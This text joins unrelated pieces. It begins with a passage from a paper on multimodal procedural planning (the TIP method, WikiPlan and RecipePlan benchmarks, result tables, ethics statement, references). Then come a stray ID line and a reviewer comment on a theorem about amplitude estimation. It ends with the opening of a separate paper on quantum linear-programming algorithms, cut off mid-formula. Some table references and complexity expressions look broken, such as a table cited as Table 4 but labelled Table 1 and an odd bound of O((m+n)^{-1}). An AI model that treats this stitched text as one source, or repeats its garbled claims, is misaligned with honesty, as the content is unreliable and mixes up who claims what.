repurposed from WikiHow[^1] and RecipeQA (Yagcioglu et al., 2018) due to their temporal relatedness among texts and images. We collect WikiPlan by crawling the household “how to” articles from WikiHow and then repurpose them into a multimodal procedural planning dataset by formulating the article title as the task name and content as the textual steps, with [^1]: https://www.wikihow.com Table 1: Percentages of multimodal procedural planning results of TIP that are better than, tied with, or worse than baselines, on randomly sampled 200 distinct tasks from each dataset. | Dataset | Ours vs. Model | Textual-Informativeness | Visual-Informativeness | Temporal Coherence | Plan Accuracy | |---------------|---------------------------------|-------------------------|------------------------|--------------------|---------------| | | Win(+) | Tie | Lose(-) | Win(+) | Tie | Lose(-) | Win(+) | Tie | Lose(-) | Win(+) | Tie | Lose(-) | | WikiPlan | | | | | | | | | | | | | | Image Ref + OFA-Caption | 63.34 | 18.38 | 18.27 | 60.63 | 20.45 | 18.92 | 61.95 | 21.03 | 17.02 | 61.99 | 19.40 | 18.61 | | Image Ref + BLIP-Caption | 62.70 | 18.70 | 18.60 | 61.26 | 21.18 | 17.56 | 62.22 | 20.78 | 17.00 | 62.29 | 18.28 | 19.43 | | Text Ref + DALL.E | 62.61 | 20.34 | 17.06 | 59.88 | 22.38 | 17.74 | 60.52 | 22.08 | 17.40 | 61.19 | 22.07 | 16.74 | | Text-Davinci-002 + Stable-Diffusion | 62.58 | 19.32 | 17.66 | 59.66 | 20.84 | 18.50 | 60.68 | 21.98 | 16.74 | 61.67 | 21.72 | 17.72 | | Text-Davinci-003 + Stable-Diffusion | 62.32 | 19.82 | 17.86 | 60.29 | 20.85 | 18.85 | 61.10 | 22.17 | 16.73 | 61.48 | 20.29 | 18.23 | | RecipePlan | | | | | | | | | | | | | | Image Ref + OFA-Caption | 64.51 | 18.29 | 17.20 | 62.39 | 20.18 | 17.43 | 62.74 | 20.40 | 16.86 | 63.66 | 19.19 | 17.15 | | Image Ref + BLIP-Caption | 64.81 | 18.52 | 16.61 | 62.29 | 19.60 | 18.11 | 62.31 | 20.72 | 16.58 | 62.90 | 19.08 | 18.02 | | Text Ref + DALL.E | 61.16 | 20.15 | 17.69 | 59.60 | 20.80 | 18.04 | 60.04 | 21.34 | 18.94 | 61.11 | 18.68 | 18.68 | | Text Ref + Stable-Diffusion | 61.31 | 19.81 | 18.87 | 60.49 | 20.37 | 19.14 | 60.37 | 20.33 | 19.31 | 62.38 | 18.81 | 18.81 | | Text-Davinci-002 + Stable-Diffusion | 62.50 | 19.33 | 18.17 | 60.59 | 18.12 | 21.29 | 61.24 | 21.13 | 17.63 | 62.30 | 17.38 | 20.31 | | Text-Davinci-003 + Stable-Diffusion | 62.85 | 19.26 | 18.09 | 61.10 | 20.80 | 18.90 | 61.46 | 20.60 | 17.94 | 62.85 | 18.13 | 18.40 | the pictures as the visual steps. We collect RecipePlan from RecipeQA dataset for multimodal procedural planning by sequencing all the given text-image pairs as the text and image plan correspondingly, with the main title as the task name. We conduct zero-shot experiments on 1,000 distinct, randomly sampled tasks from each dataset. More dataset details are in Appendix C. Table 2: Automatic evaluations on 2,000 distinct tasks from WikiPlan and RecipePlan. Image Ref and Text Ref baselines use image and text title references from the dataset. Our TIP uses Text-Davinci-003 and Stable-Diffusion as the LLM and T2I model. We underline and bold highest score of models with and without reference baselines. | Dataset | Model | Text Plan | Image Plan | Multimodality Plan | Step Length | |---------------|------------------------|-----------|------------|--------------------|-------------| | | | WMD | S-BERT | ROUGE-L | METEOR | FID ↑ | CLIP ↑ | Cap-S | Text-S | ALL-S | Avg. | | WikiPlan | | | | | | | | | | | | | Image Ref + BLIP-Caption | 0.78 | 0.35 | 0.06 | 0.04 | - | 0.71 | 0.36 | 0.41 | 0.39 | 8.26 | | Image Ref + OFA-Caption | 0.86 | 0.37 | 0.07 | 0.06 | - | 0.71 | 0.36 | 0.42 | 0.37 | 8.26 | | Text Ref + DALL.E | 0.68 | 0.76 | 0.28 | 0.12 | 47.39 | 0.74 | 0.33 | 0.26 | 0.29 | 8.26 | | Text Ref + Stable-Diffusion | 0.68 | 0.76 | 0.28 | 0.12 | 56.64 | 0.73 | 0.34 | 0.26 | 0.30 | 8.26 | | Text-Davinci-002 + Stable-Diffusion | 0.87 | 0.65 | 0.10 | 0.06 | 61.17 | 0.50 | 0.33 | 0.25 | 0.28 | 4.70 | | Text-Davinci-003 + Stable-Diffusion | 0.86 | 0.67 | 0.11 | 0.08 | 57.87 | 0.70 | 0.33 | 0.27 | 0.30 | 6.68 | | TIP (Ours) | 0.90 | 0.67 | 0.12 | 0.09 | 48.82 | 0.78 | 0.34 | 0.28 | 0.31 | 6.75 | | RecipePlan | | | | | | | | | | | | | Image Ref + OFA-Caption | 0.77 | 0.37 | 0.08 | 0.05 | - | 0.64 | 0.42 | 0.56 | 0.49 | 6.93 | | Image Ref + BLIP-Caption | 0.82 | 0.40 | 0.09 | 0.10 | - | 0.64 | 0.43 | 0.48 | 0.46 | 6.93 | | Text Ref + DALL.E | 0.21 | 0.59 | 0.10 | 0.09 | 53.55 | 0.63 | 0.46 | 0.40 | 0.43 | 6.93 | | Text Ref + Stable-Diffusion | 0.21 | 0.59 | 0.10 | 0.09 | 54.38 | 0.61 | 0.48 | 0.40 | 0.44 | 6.93 | | Text-Davinci-002 + Stable-Diffusion | 0.84 | 0.63 | 0.11 | 0.10 | 60.11 | 0.49 | 0.44 | 0.33 | 0.38 | 5.17 | | Text-Davinci-003 + Stable-Diffusion | 0.85 | 0.68 | 0.12 | 0.13 | 60.07 | 0.73 | 0.42 | 0.35 | 0.38 | 6.82 | | TIP (Ours) | 0.86 | 0.68 | 0.13 | 0.14 | 58.68 | 0.79 | 0.43 | 0.36 | 0.40 | 6.94 | 4.2 Evaluation Metrics We conduct head-to-head comparisons using Amazon Mechanical Turk (AMT) platform (details can be found in Appendix D.1) on four aspects: (1) Textual Informativeness: the text plans contain the necessary information to complete the task, (2) Visual Informativeness: the image plans contain the necessary information to complete the task, (3) Temporal Coherence: the multimodal plans meet the temporal commonsense requirements, such as the order in which the steps occur, (4) Planning Accuracy: whether referring to the multimodal plans can successfully assist task completion. In addition, we measure semantic relevance between predicted text plans and reference text plans using Word Mover’s Distance (WMD) (Kusner et al., 2015), Sentence-BERT (S-BERT) (Reimers & Gurevych, 2019), ROUGE-L (Lin, 2004), and METEOR (Banerjee & Lavie, 2005). We evaluate image plans using FID (Heusel et al., 2017) and CLIPScore (Hessel et al., 2021; Radford et al., 2021). We calculate Caption-Sentence-BERT (Cap-S) and Text-Sentence-BERT (Text-S) scores by comparing predicted image and text plans respectively to reference text using S-BERT. The average of these yields the All-Sentence-BERT (ALL-S) score for multimodal plans. Evaluations are conducted at a procedure level. More details of evaluation can be found in Appendix D. 4.3 Baselines As we are exploring a novel task, that require generating the image and text plans conditioned on the high-level goals, no existing models can be directly applied. To validate the effectiveness of our designed dual bridges, we devise several intuitive baselines for comparison: (1) ImageRef + Table 3: Robustness check of various templates used in both Text-to-Image Bridge and Image-to-Text Bridge over WikiPlan and RecipePlan dataset. The underlined templates are misleading examples. Our Text-Image Prompting model chooses the template with averaged best multimodal alignment, highlighted in purple. | Text-to-Image Bridge Template | Alignment | Image-to-Text Bridge Template | Alignment | |-------------------------------|-----------|------------------------------|-----------| | What do I need to draw in the picture to describe the above text? | 0.9625 | Rewrite the textual instruction with the knowledge from visualized instruction pair-wisely. | 0.7644 | | What do you see in the figure? | 0.9366 | Based on the visual caption, can you revise the step-by-step procedure according to the paired captions? | 0.8011 | | Describe what the picture corresponding to the text should have. | 0.9070 | Revise each step according to the visual imagination. | 0.6921 | | Let’s think about what we need to visualize to present the above idea. | 0.8986 | Let’s revise the procedure using the captions. | 0.6155 | | Describe something irrelevant to the above text. | 0.5598 | What’s the procedure that disobey the captions? | 0.5079 | | What do you usually draw? | 0.5350 | Provide an interesting procedure to be irrelevant with the captions. | 0.1519 | Task: How to Juice? Step 1: Gather the necessary supplies: juicer, knife, cutting board, fruits and/or vegetables. Step 2: Wash all of the produce thoroughly. Step 3: Cut up the produce into pieces small enough to fit in your juicer’s feed tube. Step 4: Turn on the juicer and begin feeding the produce through it one piece at a time. Step 5: Collect the juice in a glass or pitcher as it is produced by the machine. Step 6: Once all of your produce has been processed through your juicer, turn off and unplug it. Step 7: Discard any pulp that was collected during this process. Step 8: Enjoy your freshly made juice! (a) Multimodal procedural plan generated by baseline Text-Davinci-003 + Stable-Diffusion. Task: How to Juice? Step 1: Gather the necessary supplies: juicer, knife, cutting board, fruits and vegetables. Step 2: Wash all of the produce thoroughly. Step 3: Cut up the produce into pieces small enough to fit in your juicer’s feed tube. Step 4: Place the cut-up pieces into a blender and blend until it becomes a liquid form. Step 5: Pour the blended mixture through your juicer’s feed tube so that it can extract juice from it. Collect the juice in a glass or pitcher as it is produced by the machine. Step 6: Once all of your produce has been processed through your juicer, turn off and unplug it. Step 7: Discard any pulp that was collected during this process and brush off any excess bark from fruits or vegetables used with a toothbrush. Step 8: Enjoy your freshly made juice! (b) Multimodal procedural plan generated by our Text-Image Prompting (TIP). Figure 6: Improved grounding in textual and visual context are highlighted in pink and green respectively. Red texts indicate reasoning of physical action in image plan generation. OFA/BLIP-Caption: use image sequences from each article/recipe as the image plans references (ImageRef), and extract captions of image references as text plans using image caption models (e.g., OFA or BLIP) (2) TextRef + DALLE/Stable-Diffusion: use titles from each article/recipe as text plans references (TextRef), and use text-to-image models (e.g., DALLE or Stable-Diffusion) to generate images as image plans conditioned on text references (3) Text-Davinci-002/003 + Stable-Diffusion: given the high-level goal, first prompt the LLMs (e.g., Text-Davinci-002/003) to generate text plans, and then use text-to-image models to generate image plans conditioned on the text plans (4) Text-Davinci-003 (Step-based) + Stable-Diffusion: all the variants are in default procedure-based, however this variant instead of generating the plan at the procedure level, it generates one step of the text plans at a time iteratively. These variants are using LLMs and T2I models separately without collaboration. 4.4 Quantitative Analysis Human Evaluation Results We conduct Win-Tie-Lose Comparison between TIP and the baselines over WikiPlan and RecipePlan. Averaged results from 200 tasks rated by 3 crowdsourcing per example are reported in Table 4. Across four aspects, TIP receives consistently higher preferences, outperforming the baselines over the winning ratio by over 60%. In terms of textual informativeness, the unimodal baselines (Image Ref + OFA-Caption and Image Ref + BLIP-Caption) is slightly worse than the unimodal text reference-based baseline (Text Ref + Stable-Diffusion and Text Ref + DALLE) and multimodal baselines (Text-Davinci-003 + Stable-Diffusion and Text-Davinci-002 + Stable-Diffusion). This is mainly due to the other baselines either directly leveraging the textual information from the reference or the rich text-based knowledge in LLMs. In terms of visual informativeness, the multimodal baselines (Text-Davinci-003 + Stable-Diffusion and Text-Davinci-002 + Stable-Diffusion) can not achieve on-par results with textual reference-based baseline. We hypothesize this is due to the lack of visual knowledge injected into LLMs. The performance gain of TIP over multimodal baselines (Text-Davinci-003 + Stable-Diffusion and Text-Davinci-002 + Stable-Diffusion) imply the importance of grounding our multimodal plans in a multimodal context. Automatic Evaluation Results In Table 2, TIP achieves consistent improvement over baselines (without Ref), and even surpasses the baselines using reference from the dataset on RecipePlan. This further confirms our superiority in generating multimodal plans with semantic correctness and alignment. Notice that Text Ref baselines directly use the title from the dataset, which is a summarized version of the main content (golden reference used in automatic evaluations). Template Robustness In Table 3, we compare various similar templates for T2I-B and I2T-B against misleading templates. The Alignment is measured with CLIP (Radford et al., 2021) to capture the similarity between given text/image and conditionally generated image/text. The poor alignment of misleading templates and similar alignment of various bridge templates prove the robustness of the template choice in the experiments. Single Bridge Effect We report the effects of Text-to-Image Bridge and Image-to-Text Bridge of TIP in Table 4. The performance drop indicates that the text plan without condition on visual information is vulnerable in text-only planning quality. In Table 5, we also observe using T2I-B brings obvious improvement over both FID score and Alignment of image plans. These results further indicate that the key ingredient of our proposed method TIP is that LLMs and multimodal generative models will collaboratively generate multimodal procedural plans benefiting from our designed dual bridges. | Model | WikiPlan | RecipePlan | |-------------|----------|------------| | | Avg. Textual | Avg. Textual | | w.o. T2I-B | 0.341 (-18.4%) | 0.363 (-14.1%) | | w.o. I2T-B | 0.261 (-37.5%) | 0.273 (-35.4%) | Step-based or Procedure-based We explore our procedure-based method (P-Ours) against the step-based TIP (S-Ours) and step-based Text-Davinci-003 + Stable-Diffusion (S-Base). The main difference from step-based approach is the plan is generated one step at a time. Since LLMs achieve promising long text reasoning capability, we generate the full procedure for efficiency consideration. We report the head-to-head comparison results in Figure 7. The procedure-based method achieves 60% win rate over the step-based TIP. We observe this is partially due to the instinct of LLMs to repeat input texts and is less clear to understand the full intent of generation expectation. Thus the procedure-based method usually achieves better planning quality at the very beginning. 4.5 Qualitative Analysis Multimodal Grounding In Figure 6, we compare the performance of TIP to baselines in multimodal procedural planning. TIP generate image plans that are grounded in the textual context. With the help of LLMs reasoning in the temporal dimension, we transfer this ability to image generation, conditioning on the revised prompts of LLMs. This allows digestion of the temporal and complex reasoning present in the text plan and directly indicates what needs to be depicted in the image. The highlighted steps of image plans correctly visualize the scene described in the textual context. For example, at Step 2, instead of only showing the vegetables, ours show an image of a person washing the produce thoroughly. TIP also generate text plans that are better grounded in the image plan. The text plan correctly refers to the objects in visual input, such as “liquid form” and “blended mixture”, and also complements the visual context, such as “extract juice from it”. Our results indicate the potential for uncovering multimodal reasoning capabilities in LLMs. We provide more comparisons on multimodal procedural planning in Appendix E. Module Outputs We showcase all the details of the outputs of each module for the example task “How to make a candy bouquet” in Figure 8. The T2I-B leverage the complex language comprehension and zero-shot reasoning ability of LLMs to generate imagination prompt. This enhances the specificity of the initial plan in terms of improving text-to-image generation. With the textual-grounded image plan, we can extract higher-quality visual information to reversely revise the text plan. More specifically, the I2T-B injects visual knowledge via verbalization of the visual plans to generate a visually-grounded and complementary textual plan. In the end, the generated image and text plans are mutually grounded. Please refer to Appendix B.2 for more module output details. 5 Conclusion and Future Work We introduce the Multimodal Procedural Planning task that aims to generate goal-conditioned text and image subsequences and benchmark models’ performance with our curated testbed WIKIPLAN and RECIPEPLAN. We propose Text-Image Prompt (TIP), a dual-modality prompting framework, that connects large language models with multimodal generative models to enable plausible multimodal procedural plan generation. We hope our work shed light on future research into uncovering this limitless capability of multimodal procedural planning driven by uniform automatic metrics. ETHICS STATEMENT We acknowledge that our research utilizes resourceful knowledge in large-scale pre-trained models, which have the potential to bias to a certain cultural background. For example, the task from RECIPEPLAN and WIKIPLAN that involve food preparation may have different procedures depending on different individuals’ eating habits. We encourage future studies that uncover the multimodal procedural planning ability with consideration of personalized decision makings. The data annotation part of the project is classified as exempt by Human Subject Committee via IRB protocols. The hourly wage paid to participants is estimated at $12, which is higher than the federal minimum wage. We manually ensure no personal information is collected and no offensive content is presented during human evaluations. REFERENCES Jean-Baptiste Alayrac, Jeff Donahue, Pauline Luc, Antoine Miech, Iain Barr, Yana Hasson, Karel Lenc, Arthur Mensch, Katie Millican, Malcolm Reynolds, et al. Flamingo: a visual language model for few-shot learning. *arXiv preprint arXiv:2204.14198*, 2022. Peter Anderson, Qi Wu, Damien Teney, Jake Bruce, Mark Johnson, Niko Sünderhauf, Ian Reid, Stephen Gould, and Anton Van Den Hengel. Vision-and-language navigation: Interpreting visually-grounded navigation instructions in real environments. In *Proceedings of the IEEE conference on computer vision and pattern recognition*, pp. 3674–3683, 2018. Satanjeev Banerjee and Alon Lavie. Meteor: An automatic metric for mt evaluation with improved correlation with human judgments. In *IEEvaluation@ACL*, 2005. Anthony Brohan, Yevgen Chebotar, Chelsea Finn, Karol Hausman, Alexander Herzog, Daniel Ho, Julian Ibarz, Alex Irpan, Eric Jang, Ryan Julian, et al. Do as i can, not as i say: Grounding language in robotic affordances. In *6th Annual Conference on Robot Learning*, 2022. Tim Brooks, Aleksander Holynski, and Alexei A Efros. Instructpix2pix: Learning to follow image editing instructions. *arXiv preprint arXiv:2211.09800*, 2022. Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. *Advances in Neural Information Processing Systems (NeurIPS)*, 33:1877–1901, 2020. Rémi Calizzano, Malte Ostendorff, and Georg Rehm. Ordering sentences and paragraphs with pre-trained encoder-decoder transformers and pointer ensembles. In *Proceedings of the 21st ACM Symposium on Document Engineering*, pp. 1–9, 2021. Tuhin Chakrabarty, Arkady Saakyan, Olivia Winn, Artemis Panagopoulou, Yue Yang, Marianna Apidianaki, and Smaranda Muresan. I spy a metaphor: Large language models and diffusion models co-create visual metaphors. *OpenReview Preprint*, 2022. preprint under review. Chien-Yi Chang, De-An Huang, Danfei Xu, Ehsan Adeli, Li Fei-Fei, and Juan Carlos Niebles. Procedure planning in instructional videos. In *European Conference on Computer Vision*, pp. 334–350. Springer, 2020. Xinchi Chen, Xipeng Qiu, and Xuanjing Huang. Neural sentence ordering. *arXiv preprint arXiv:1607.06952*, 2016. Jaemin Cho, Jie Lei, Hao Tan, and Mohit Bansal. Unifying vision-and-language tasks via text generation. In *International Conference on Machine Learning*, pp. 1931–1942. PMLR, 2021. Baiyun Cui, Yingming Li, Ming Chen, and Zhongfei Zhang. Deep attentive sentence ordering network. In *Proceedings of the 2018 Conference on Empirical Methods in Natural Language Processing*, pp. 4340–4349, 2018.
rUx0zQFwD1
Thm. 2.3: it would be better to explain the difference between the consistent version and the usual version of amplitude estimation before stating the theorem. $f$ is not defined. Is it some fixed function? So, when $p$ and $s$ are fixed, with high probability, the algorithm's output will be the same?
Quantum Speedups in Linear Programming via Sublinear Multi-Gibbs Sampling Anonymous authors Paper under double-blind review Abstract As a basic optimization technique, linear programming has found wide applications in many areas. In this paper, we propose an improved quantum algorithm for solving a linear programming problem with $m$ constraints and $n$ variables in time $\tilde{O}(\sqrt{m + n}\gamma^{2.25})$, where $\gamma = Rr/\varepsilon$ is the additive error scaled down with bounds $R$ and $r$ on the size of the primal and dual optimal solutions, improving the prior best $\tilde{O}(\sqrt{m + n}\gamma^{2.5})$ by Bouland, Getachew, Jin, Sidford, and Tian (2023) and Gao, Ji, Li, and Wang (2023). Our algorithm solves linear programming via a zero-sum game formulation, under the framework of the sample-based optimistic multiplicative weight update. At the heart of our construction, is an improved quantum multi-Gibbs sampler for diagonal Hamiltonians with time complexity sublinear in inverse temperature $\beta$, breaking the general $O(\beta)$-barrier. 1 Introduction Linear programming is a powerful mathematical optimization technique used to achieve the best outcomes given a set of requirements represented as linear relationships. It involves maximizing a linear objective function subject to linear equality or inequality constraints, where the variables can take real values. It enables optimal and efficient decision-making in many complex real-world problems, including resource allocation, portfolio optimization, and network flows. It is also fundamental to combinatorial optimization. To be more concrete, a linear programming (LP) problem can be formulated in the following standard form: consider a matrix $A \in \mathbb{R}^{m \times n}$; the question is to decide the maximum value of $c^T x$ where $c$ is a given vector in $\mathbb{R}^n$ and $x$ is the variable vector under the constraints $Ax = b$ for some $b \in \mathbb{R}^m$. In the study of general LP algorithms, people usually assume $m = \Theta(n)$ for simplicity. Also, there are cases where the algorithm can only output an approximate optimal value with $\varepsilon$ additive error. In 1947, the simplex method was proposed by George Dantzig to solve the linear programming problem. The simplex algorithm is very efficient in practice. However, in 1972, it was shown that the worst time complexity for the simplex algorithm is exponential (with respect to $n$) (Klee & Minty [1972]). The linear programming problem was proven to be solvable in polynomial time by Leonid Khachiyan in 1979 (Khachiyan [1980]). In recent years, there have been several works (Cohen et al., 2021; Jiang et al., 2021) which aim to give faster algorithms for the linear programming problem. In Cohen et al. (2021), the authors gave an algorithm for LP in $O^*(n^\omega)$ time,\footnote{Throughout this paper, $\omega \approx 2.37$ denotes the matrix multiplication exponent.} for current value $\omega \approx 2.37$ and $O^*(n^{2+1/6})$ if $\omega = 2$. In Cohen et al. (2021), the authors improve the latter complexity to $O^*(n^{2+1/18})$ if $\omega \approx 2$. Linear programming has deep connections to matrix games in game theory. A matrix game involves two players who each have to choose between a finite set of pure strategies. The payoffs for each player are given in a payoff matrix based on the pure strategies chosen. Matrix games can be expressed as linear programs, with the payoff matrix providing the coefficients for the objective function and constraints. The linear programming formulation allows for identifying the optimal mixed strategies that maximize the expected payoff for each player. Solving the corresponding dual linear program yields the value of the game. Therefore, techniques developed for solving linear programs can also be applied to finding optimal solutions for matrix games. Conversely, finding optimal solutions for matrix games can also be transformed into algorithms for linear programming (Vaserstein [2006]). In Grigoriadis & Khachiyan (1995), the authors gave an $\tilde{O}((n + m)/\varepsilon^2)$ time randomized algorithm for matrix games. This is done by updating a single entry of the strategy vectors each time. In Carmon et al. (2019), using the variance reduction technique, the authors gave a $\tilde{O}(mn + \sqrt{mn(m + n)}/\varepsilon)$ time algorithm for matrix games. Quantum computation utilizes the principle of quantum mechanics to perform computation in a different way from classical computation. Rather than using classical binary bits (which only have two states 0 and 1), quantum computers use quantum bits (qubits) to store data and perform computation. The state of qubits can be in a superposition of 0 and 1 states. Harnessing this superposition feature, quantum algorithms are able to achieve speedups than their classical counterparts. For instance, Shor’s algorithm for integer factorization and Grover’s algorithm for database search provide provable speedups over the best-known classical algorithms. Over the years, many quantum algorithms have been developed with quantum speedups over their classical counterparts. In the area of optimization, quantum algorithms for semi-definite programming are one of the most important research areas in quantum algorithms (Brandao & Svore, 2017; van Apeldoorn et al., 2017; Brandão et al., 2019; van Apeldoorn & Gilyén, 2019a). Other examples of quantum algorithms include quantum recommendation systems (Kerenidis & Prakash, 2017) and quantum algorithms for training linear and kernel-based classifiers (Li et al., 2019). In van Apeldoorn et al. (2017), the authors pointed out that their algorithm for semi-definite programming can also be applied to solve linear programming problems in time $\tilde{O}(\sqrt{mn(Rr/\varepsilon)^5})$ where $R$ and $r$ are parameters related to the numerical scale of the problem. Then, in van Apeldoorn & Gilyén (2019b), the authors gave a quantum algorithm specifically for matrix zero-sum games and linear programming with running time $\tilde{O}(\sqrt{m+n}(Rr/\varepsilon)^3)$, which is by designing a quantum Gibbs sampler and use the framework proposed in Grigoriadis & Khachiyan (1995). Following this work, in Bouland et al. (2023), the authors proposed an improved dynamic Gibbs sampler, which results in an $\tilde{O}(\sqrt{m+n}/\varepsilon^{2.5})$-time solver for matrix zero-sum games. This work presents improved quantum algorithms for matrix zero-sum games and linear programming by extending the framework of sample-based optimistic multiplicative weight update first proposed by Gao et al. (2023). The framework requires a specific task called multi-Gibbs sampling, which requires the quantum subroutine to collect multiple samples from the Gibbs distribution in a single update iteration. In their work, they used the “preparing many copies of a quantum state” technique of Hamoudi (2022) and the quantum singular value transformation (Gilyén et al., 2019) to give an efficient quantum multi-Gibbs sampler. All the previous quantum Gibbs samplers used in van Apeldoorn & Gilyén (2019b); Bouland et al. (2023); Gao et al. (2023) have a linear dependence on the $\ell_1$-norm $\beta$ of the vector $u$. The parameter $\beta$ plays the role of inverse temperature as it scales the diagonal Hamiltonian $H = \text{diag}(u)/\beta$ of trace norm 1. This $\beta$-dependence is known as the $\Omega(\beta)$ barrier and is proved for general quantum Gibbs sampling (Gilyén et al., 2019; Wang & Zhang, 2023). Surprisingly, our improved multi-Gibbs sampler breaks this $\Omega(\beta)$ bound in the sense of amortized complexity per sample under certain conditions. This improvement is the key to our further speedup compared with the previous approach in Gao et al. (2023). By combining this new multi-Gibbs sampler with the sample-based optimistic weight update framework, we present an $\tilde{O}(\sqrt{m+n}/\varepsilon^{2.25})$-time quantum linear programming solver for matrix zero-sum games and $\tilde{O}(\sqrt{m+n}(Rr/\varepsilon)^{2.25})$-time quantum linear programming solver. ### 1.1 Our Result We propose quantum algorithms for solving matrix zero-sum games and linear programming problems, which improves on the aspect of the runtime of the prior state-of-the-art quantum algorithms (Bouland et al., 2023; Gao et al., 2023). **Theorem 1.1** (Informal version of Corollary 4.2). There exists a quantum algorithm that, for $\varepsilon \in (0, 1/2)$ satisfying $1/\varepsilon = O((m+n)^2)$, returns an $\varepsilon$-approximate Nash equilibrium for the zero-sum game $A \in \mathbb{R}^{m \times n}$ with probability at least $2/3$ in $\tilde{O}(\sqrt{m+n}/\varepsilon^{2.25})$ time. Notice that our theorem requires $1/\varepsilon = \tilde{O}((m+n)^2)$. If this does not hold, i.e., $1/\varepsilon = \tilde{\Omega}((m+n)^2)$, we can directly uses the algorithm in Grigoriadis & Khachiyan (1995) with better time complexity. In comparison, the algorithms in Bouland et al. (2023); Gao et al. (2023) with time complexity $\tilde{O}(\sqrt{m+n}/\varepsilon^{2.5})$ requires $1/\varepsilon = O((m+n)^{-1})$. Our algorithm allows a wider range of parameter choices and achieves further quantum speedups on this problem. For the linear programming solver, we have: **Theorem 1.2** (Informal version of Corollary 4.3). There exists a quantum algorithm that, for $\varepsilon \in (0, 1/2)$, returns an $\varepsilon$-feasible and $\varepsilon$-optimal solution for linear programming problems of $n$ variables and $m$ constraints with probability at least $2/3$ in $\tilde{O}(\sqrt{m+n}\gamma^{2.25})$ time, provided that $R$, $r$ are the bounds on the $\ell_1$ norm of the primal and dual optimal solutions and $\gamma = Rr/\varepsilon = \tilde{O}((m+n)^2)$. In Table 1 we compare our algorithm with previous classical and quantum algorithms for linear programming. The essential part in proving our theorem is an improved quantum multi-Gibbs sampler for diagonal Hamiltonians which we state below. **Theorem 1.3 (Informal version of Theorem 3.2).** There exists a quantum algorithm such that, for every \( \varepsilon \in (0, 1/2) \) and a \( (\beta, \lceil \log_2(n) \rceil, O(1), O(1)) \)-amplitude-encoding \( V \) of a vector \( u \in \mathbb{R}^n_{>0} \) with \( \beta \geq 1 \), if the number of copies \( k \) satisfies \( k = \Omega(\sqrt{\beta}) \) and \( k = \tilde{O}(n\sqrt{\beta}) \), then with probability at least \( 1 - \varepsilon \) the algorithm will return \( k \) samples from a distribution that is \( \varepsilon \)-close to the Gibbs distribution of \( u \) in the total variation distance in \( \tilde{O}(\beta^{3/4}\sqrt{n}k) \) time. | Method | Approach | Type | Classical/Quantum Time Complexity | |-------------------------|---------------------------------|--------|----------------------------------| | Multiplicative Weight | Grigoriadis & Khachiyan [1995] | Classical | \( \tilde{O}((m+n)\gamma^2) \) | | Multiplicative Weight | Syrgkanis et al. [2015] | Classical | \( \tilde{O}(mn\gamma) \) | | Multiplicative Weight | Li et al. [2019] | Quantum | \( \tilde{O}(\sqrt{m+n}\gamma^4) \) | | Multiplicative Weight | van Apeldoorn & Gilyén [2019b] | Quantum | \( \tilde{O}(\sqrt{m+n}\gamma^3) \) | | Multiplicative Weight | Bouland et al. [2023] | Quantum | \( \tilde{O}(\sqrt{m+n}\gamma^{2.5}) \) | | Multiplicative Weight | Gao et al. [2023] | Quantum | \( \tilde{O}(\sqrt{m+n}\gamma^{2.5}) \) | | Multiplicative Weight | Our result | Quantum | \( \tilde{O}(\sqrt{m+n}\gamma^{2.25}) \) | | Interior Point | Jiang et al. [2021] | Classical | \( O^*(m+n)^{2\gamma} \) | | Interior Point | Casares & Martin-Delgado [2020]| Quantum | \( \tilde{O}(\sqrt{n}(m+n)M\kappa/\varepsilon^2) \) † | † \( M \) and \( \kappa \) are the Frobenius norm and condition number of the systems of linear equations in the algorithm. ### 1.2 Main Techniques Quantum Gibbs sampling was used in solving SDP and LP problems ([Brandão & Svore, 2017], [van Apeldoorn et al., 2017], [Brandão et al., 2019], [van Apeldoorn & Gilyén, 2019a,b], [Bouland et al., 2023]). Recently, a specifically designed Gibbs sampling for diagonal Hamiltonians was proposed in [van Apeldoorn & Gilyén, 2019b] for solving zero-sum games and LPs. In [van Apeldoorn & Gilyén, 2019b], their quantum Gibbs sampler adopts the idea of quantum rejection sampling ([Grover, 2000], [Ozols et al., 2013]). The sampler first prepares a uniform superposition state \( |\Psi\rangle \), and then applies a unitary block-encoding of \( \exp(\beta H) \) on the state, where \( H \) is the diagonal Hamiltonian \( \text{diag}(u-u_{\max})/\beta \) where \( u = Ax \) with \( \beta \geq \|u\|_1 \), resulting in a state \[ |\psi\rangle \approx \frac{1}{\sqrt{n}}|0\rangle|u_{\text{Gibbs}}\rangle + |1\rangle|\text{garbage}\rangle, \] where measuring \( |u_{\text{Gibbs}}\rangle \) in the computational basis will return a classical sample from the desired Gibbs distribution. The unitary block-encoding is constructed by quantum singular value transformation (QSVT) with a polynomial approximating \( \exp(\beta x) \) of degree \( \tilde{O}(\beta) \). In [Gao et al., 2023], they improved the procedure of [van Apeldoorn & Gilyén, 2019b] by (i) preparing a non-uniform initial state \( |\Psi'\rangle \) after a \( \tilde{O}(\beta\sqrt{n/k}) \)-time pre-processing procedure, adapting from the “preparing many copies of a quantum state” techniques in [Hamoudi, 2022], (ii) applying a unitary block-encoding of \( \exp(\beta H') \) where \( H' \) is determined by the pre-processing procedure, which results in a state \[ |\psi'\rangle \approx \sqrt{\frac{k}{n}}|0\rangle|u_{\text{Gibbs}}\rangle + |1\rangle|\text{garbage}\rangle. \] Then, they can obtain a copy of \( |u_{\text{Gibbs}}\rangle \) in \( \tilde{O}(\beta\sqrt{n/k}) \) time, thereby \( k \) copies in \( \tilde{O}(\beta\sqrt{n}k) \). In this paper, we further improved the multi-sampling of [Gao et al., 2023] with two novel observations. **Better polynomial approximation.** In the previous works ([van Apeldoorn & Gilyén, 2019b], [Bouland et al., 2023], [Gao et al., 2023]), they used a polynomial of degree \( \tilde{O}(\beta) \) to approximate the function \( \exp(\beta x) \). We observe that the polynomial is only required to be well-behaved on the interval \([-1, 0]\). Thus, the polynomial approximation for \( \exp(-\beta - \beta x) \) suffices, with a polynomial of degree \( \tilde{O}(\sqrt{\beta}) \) known in [Sachdeva & Vishnoi, 2014]. Using this polynomial, we can reduce the time complexity of step (ii) of the algorithm of [Gao et al., 2023] to \( \tilde{O}(\beta\sqrt{n}k) \) for preparing \( k \) copies of \( |u_{\text{Gibbs}}\rangle \). Tradeoff between pre-processing and multi-sampling. Even though we reduce the time complexity of step (ii) of the algorithm of Gao et al. (2023), the overall time complexity still remains unchanged due to the dominating time complexity of the pre-processing procedure. We thus parameterize both the pre-processing and multi-sampling procedures with time complexity $\tilde{O}(\beta 